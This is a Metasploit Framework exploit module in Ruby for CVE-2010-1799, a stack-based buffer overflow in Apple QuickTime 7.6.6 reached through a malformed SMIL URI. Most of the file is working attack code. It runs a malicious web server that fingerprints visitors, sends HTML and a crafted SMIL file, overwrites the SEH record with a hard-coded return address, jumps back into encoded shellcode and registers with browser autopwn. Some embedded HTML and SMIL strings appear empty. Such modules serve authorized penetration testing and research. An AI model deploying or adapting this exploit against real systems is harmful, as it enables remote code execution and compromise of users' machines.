## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking # needs more testing/targets to be Great include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Seh include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :os_name => OperatingSystems::WINDOWS, :javascript => true, :rank => NormalRanking, # reliable memory corruption :vuln_test => nil, }) def initialize(info = {}) super(update_info(info, 'Name' => 'Apple QuickTime 7.6.6 Invalid SMIL URI Buffer Overflow', 'Description' => %q{ This module exploits a buffer overflow in Apple QuickTime 7.6.6. When processing a malformed SMIL uri, a stack-based buffer overflow can occur when logging an error message. }, 'Author' => [ 'Krystian Kloskowski', # original discovery 'jduck' # Metasploit module ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-1799' ], [ 'OSVDB', '66636'], [ 'BID', '41962' ], [ 'URL', 'http://secunia.com/advisories/40729/' ], [ 'URL', 'http://support.apple.com/kb/HT4290' ] ], 'DefaultOptions' => { 'EXITFUNC' => 'process', 'InitialAutoRunScript' => 'migrate -f', }, 'Payload' => { 'Space' => 640, # 716 - 63 - 8 - 5 'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40\x5c", }, 'Platform' => 'win', 'Targets' => [ #[ 'Automatic', { } ], [ 'Apple QuickTime Player 7.6.6', { 'Ret' => 0x66801042 # p/p/r from QuickTime.qts (v7.66.71.0) } ], ], 'Privileged' => false, 'DisclosureDate' => 'Aug 12 2010', 'DefaultTarget' => 0)) end def on_request_uri(client, request) return if ((p = regenerate_payload(client)) == nil) if (request['User-Agent'] =~ /QuickTime/i or request.uri =~ /\.smil$/) print_status("Sending exploit SMIL (target: #{target.name})") # This is all basically filler on the browser target because we can't # expect the SEH to be in a reliable place across multiple browsers. # Heap spray ftw. off = 716 start = "cHTTPDhlr_SetURL - url doesn't start with http:// or http1:// '" scheme = rand_text_alphanumeric(5) sploit = '' sploit << scheme sploit << "://" # payload sploit << p.encoded # pad to SEH sploit << rand_text_english(off - sploit.length - start.length) # seh frame sploit << generate_seh_record(target.ret) # jmp back to payload distance = off + 8 - (8 + start.length) sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string # force exception while writing sploit << rand_text(1024) * 15 smil = %Q| | send_response(client, smil, { 'Content-Type' => "application/smil" }) else print_status("Sending initial HTML") shellcode = Rex::Text.to_unescape(p.encoded) url = ((datastore['SSL']) ? "https://" : "http://") url << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(client.peerhost) : datastore['SRVHOST']) url << ":" + datastore['SRVPORT'].to_s url << get_resource fname = rand_text_alphanumeric(4) content = "" content << <<-ENDEMBED ENDEMBED content << "" send_response(client, content, { 'Content-Type' => "text/html" }) end # Handle the payload handler(client) end end